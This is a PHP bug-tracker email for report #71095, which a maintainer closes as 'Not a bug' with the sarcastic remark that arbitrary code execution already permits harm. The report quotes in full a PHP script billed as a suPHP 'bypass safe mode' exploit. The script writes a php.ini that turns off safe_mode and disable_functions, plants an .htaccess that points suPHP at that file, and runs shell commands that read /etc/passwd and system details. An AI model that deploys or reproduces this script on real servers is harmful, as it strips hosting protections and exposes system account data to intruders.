Bug #71095 [Opn->Nab]: Vulnerability Bypassing Safe Mode with Exploit in apache 1.x And 2.x
| From: | requinix@php.net | Date: | Fri, 11 Dec 2015 15:53:33 +0000 |
| Subject: | Bug #71095 [Opn->Nab]: Vulnerability Bypassing Safe Mode with Exploit in apache 1.x And 2.x | ||
| References: | 1 | Groups: | php.bugs |
| Request: | Send a blank email to php-bugs+get-197800@lists.php.net to get a copy of this message | ||
Edit report at https://bugs.php.net/bug.php?id=71095&edit=1
ID: 71095
Updated by: requinix@php.net
Reported by: soufiane dot boussali at efet dot ac dot ma
Summary: Vulnerability Bypassing Safe Mode with Exploit in
apache 1.x And 2.x
-Status: Open
+Status: Not a bug
Type: Bug
-Package: PHP Language Specification
+Package: *General Issues
Operating System: multiple
PHP Version: 7.0.1RC1
Block user comment: N
Private report: N
New Comment:
So you're saying that if somebody can execute arbitrary code on your server then they can do
all sorts of bad things? NO WAY!
Previous Comments:
------------------------------------------------------------------------
[2015-12-11 14:55:13] soufiane dot boussali at efet dot ac dot ma
Description:
------------
apache 1.x <=> 2.x suphp (suPHP_ConfigPath) bypass safe mode exploitâ
<?
/*
apache 1.x <=> 2.x suphp (suPHP_ConfigPath) bypass safe mode exploit
Author : Soufiane Boussali
Facebook : fb.com/soufian.ckin2u
*/
echo "[+] Start...
";
$bypfile=fopen(php.ini,w+);
$stuffile=fopen(.htaccess,w+);
if($bypfile and $stuffile!= NULL){
echo "[+] evil files created succes !
";
}
else{
echo "[-] access denial !
";
}
$byprullz1="safe_mode = OFF
";
$byprullz2="disable_functions = NONE";
$dj=fwrite($bypfile,$byprullz1);
$dj1=fwrite($bypfile,$byprullz2);
fclose($bypfile);
if($dj and $dj1!= NULL){
echo "[+] php.ini writed
";
}
else{
echo "[-] 404 php.ini not found !
";
}
$breakrullz="suPHP_ConfigPath /home/user/public_html/php.ini"; // replace this
/home/user/public_html by ur path
$sf7=fwrite($stuffile,$breakrullz);
fclose($stuffile);
if($sf7!= NULL){
echo "[+] evil .htaccess writed
";
echo "[+] exploited by success!
";
echo " [+] discouvred by Hacker404
";
echo " [+] hackerone.com/hacker404
";
echo " [+] Facebook : fb.com/soufian.ckin2u
";
}
else{
echo "[-] evil .htaccess Not found!
";
}
system("pwd;ls -lia;uname -a;cat /etc/passwd");
#EOF
?>
Risk : high Levele
Soufiane Boussali
Best Regards,
------------------------------------------------------------------------
--
Edit this bug report at https://bugs.php.net/bug.php?id=71095&edit=1